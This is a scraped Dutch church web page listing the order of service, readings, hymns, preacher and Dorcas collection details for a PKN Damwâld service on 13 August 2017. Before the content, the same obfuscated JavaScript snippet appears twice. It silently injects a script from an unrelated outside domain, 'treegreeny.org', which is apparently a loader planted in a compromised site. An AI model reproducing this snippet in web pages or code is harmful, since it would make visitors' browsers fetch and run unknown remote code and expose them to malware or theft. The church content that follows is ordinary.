;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 13 augustus 2017 9:30 uur - PKN Damwâld
zondag 13 augustus 2017
09:30 uur

Kerkdienst zondag 13 augustus 2017 9:30 uur

Thema: „Waarin onderscheiden wij ons?”

Informatie

Voorganger:Kand. H.J. van der Wal, Groningen
Organist:Foeke Wiegersma
Thema:„Waarin onderscheiden wij ons?”
Liturgie
Lied voor de dienst Evangelische Liedbundel 168
Welkom en mededelingen
Intochtslied : Psalm 19, vers 1 en 2
Stilgebed , Votum
We zingen: Psalm 19, vers 4 en 5
Lezing van de Wet Exodus 20
We zingen: Psalm 86, vers 4
Gebed om de opening van het Woord en de verlichting van de Heilige Geest .
We lezen: Richteren 12, vers 1 t/m 6
We zingen: Psalm 68, vers 6 en 7
Preek „Waarin onderscheiden wij ons?”
We zingen: Gezang 454, vers 1, 2, 3 en 4
Dankgebed en voorbeden
Collecte
Slotlied Gezang 21, vers 1 en 3
Zegenbede
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Dorcas

Dorcas is een Internationale Christelijke organisatie voor ontwikkelingssamenwerking, sociale hulp, noodhulp en wederopbouw. Dorcas zet zich in om de opdracht van Jezus Christus te vervullen: zorgen voor de armen en verdrukten (Mattheüs 25: 31-46). Zij doen dit door hen in staat te stellen hun positie in de samenleving te versterken en hun zelfredzaamheid te vergroten en door het bieden van sociale zorg en het verlenen van hulp in noodsituaties. Zij steunen de allerarmsten ongeacht hun ras, religie, geslacht of politieke overtuiging.

Tweede collecte: Kerk
Uitganscollecte: Kerk